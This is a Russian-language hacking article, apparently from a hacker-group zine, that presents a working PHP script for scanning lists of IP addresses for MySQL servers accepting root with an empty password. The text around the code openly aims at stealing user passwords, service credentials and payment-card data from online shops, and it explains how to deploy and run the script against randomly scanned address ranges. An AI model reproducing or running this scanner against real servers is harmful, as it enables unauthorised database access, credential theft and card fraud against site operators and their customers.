Пишем сканер MySQL 

     Базы данных - как много в этой фразе для сердца... кардера/хакера слилось. =) Итак что есть БД? Базы данных
     вещь  весьма  и  весьма  полезная.  В  базе могут быть все настройки форумов, движков и прочее... прочее...
     прочее...  но  что  самое  интересное  и  полезное  в базе могут находится пароли юзеров, логины и пароли к
     всевозможным   сервисам  и  главное  если  сервер  является  онлайн-шопом  в  базе  можно  найти  заказы  и
     соответственно  инфу  о картоне =) Значит нам просто необходимо поиметь пару, тройку баз данных и всё будет
     шоколадно =)
     
     Именно  такие мысли посетили меня когда я однажды вечером утюжил сеть. Особенных дел у меня в тот момент не
     было и я решил что было бы неплохо немного посканить серваки на открытый 3306 порт. Для тех кто в танке: на
     3306 порту по дефолту висит демон MySQL. Запустил сканер портов, я пользуюсь SuperScan так он имхо наиболее
     быстрый  и  удобный,  ввёл  диапазон от балды и жмахнул по кнопарю старт =) Сканер немного попыхтел и выдал
     результат,  теперь  у  меня  было  около  250 адресов на которых был открыт скульный порт. Осталось дело за
     малым,  как  всем  наверно  известно в MySQL по дефолту идёт юзер root без пароля, значит мне осталось лишь
     попробовать  подключится  к  каждому  из  этих  серверов и попробовать авторизоваться под рутом без пароля.
     Перспектива в ручную подключаться к каждому серверу меня что-то не вдохновляла. Порыскав немного по инету в
     надежде  найти прогу которая автоматизировала-бы эти действия я жестоко обломался, найти такую прогу мне не
     удалось.  Значит  придётся написать самому. Дабы вы не заморачивались с данным действием я и привожу в этой
     статье  сорсы  данной  софтины...  точнее  скрипта.  Писал  на  пхп так как этот язык мне наиболее близок и
     симпатичен, да и работа с скулём через пхп достаточно проста.

     <?
     set_time_limit(0);
     # берём список серверов для сканирования из файла servers.dat
     $servers=file("servers.dat");
     # получаем кол-во записей в файле
     $strings=count($servers);
     for($i=0; $i<$strings; $i++){
     $server=$servers[$i];
     # функция коннекта к базе, передаем переменную $server
     connect($server);
     }

     function connect($server)
     # а вот и сама функция подключения
     {
     # коннект к базе (сервер,"логин","пароль")
     $co=mysql_connect($server,"root","");

     # если подключится не удалось     
     if(!($co))
     {
     echo "connect 2 server $server failed<br>";
     }

     # если подключились то выводим сообщение
     else
     {
     echo "connect 2 server $server success<br>";
     }

     }
     ?>

     Теперь  обзываем  этот  скрипт sqlbrute.php и закидываем на сервак. После этого создаём файл servers.dat со
     списком  адресов  для  сканирования  и  также  аплоадим  на  сервер. После всего этого в браузере набиваем:
     www.ваш_сайт.ru/sqlbrute.php и получаем отчёт =)

     Возможно  некоторые  станут говорить что мол только лохи оставляют пустые пароли на базу данных и мол таких
     дебильных  админов  найти  невозможно,  но  я основываясь на своём опыте могу вам сказать что таких админов
     достаточно много и кто ищет тот всегда найдёт.
     Ну вот и всё. Хорошего вам коннекта, пухлых баз данных и гигабайтов ценной инфы.
     Удачи.




     Автор: 1dt.w0lf
     ---------------------------------------
     RusH security team - http://rst.void.ru